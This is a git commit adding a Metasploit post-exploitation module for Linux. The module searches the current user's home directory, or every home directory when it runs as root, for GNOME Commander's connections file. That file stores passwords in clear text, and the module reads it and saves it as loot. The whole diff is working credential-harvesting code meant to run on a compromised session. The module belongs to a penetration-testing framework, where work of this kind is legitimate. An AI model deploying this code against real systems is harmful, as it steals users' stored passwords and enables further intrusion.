Land rapid7#3565, GNOME Commander post module

wvu · wvu · commit 0208420a67c3 · 2014-07-28T17:28:36.000-05:00
diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb
@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class Metasploit3 < Msf::Post
+
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Linux Gather Gnome-Commander Creds',
+        'Description'   => %q{
+          Gnome-commander stores clear text passwords in ~/.gnome-commander/connections file.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
+        'Platform'      => %w{ linux },
+        'SessionTypes'  => [ 'meterpreter', 'shell']
+      ))
+  end
+
+  def run
+    user_dirs = []
+    # Search current user
+    user = cmd_exec("whoami").chomp
+    # User is root
+    if user == 'root'
+      print_status("Current user is #{user}, probing all home dirs")
+      user_dirs << '/root'
+      # Search home dirs
+      cmd_exec('ls /home').each_line.map { |l| user_dirs << "/home/#{l}".chomp }
+    else
+      # Non root user
+      print_status("Current user is #{user}, probing /home/#{user}")
+      user_dirs << "/home/#{user}"
+    end
+    # Try to find connections file in users homes
+    user_dirs.each do |dir|
+      # gnome-commander connections file
+      connections_file = "#{dir}/.gnome-commander/connections"
+      if file?(connections_file)
+        #File exists
+        begin
+          str_file=read_file(connections_file)
+          print_good("File found: #{connections_file}")
+          vprint_line(str_file)
+          #Store file
+          p = store_loot("connections", "text/plain", session, str_file, connections_file, "Gnome-Commander connections")
+          print_good ("Connections file saved to #{p}")
+        rescue EOFError
+          # If there's nothing in the file, we hit EOFError
+          print_error("Nothing read from file: #{connections_file}, file may be empty")
+        end
+      else
+        # File not found
+        vprint_error("File not found: #{connections_file}")
+      end
+    end
+  end
+
+end
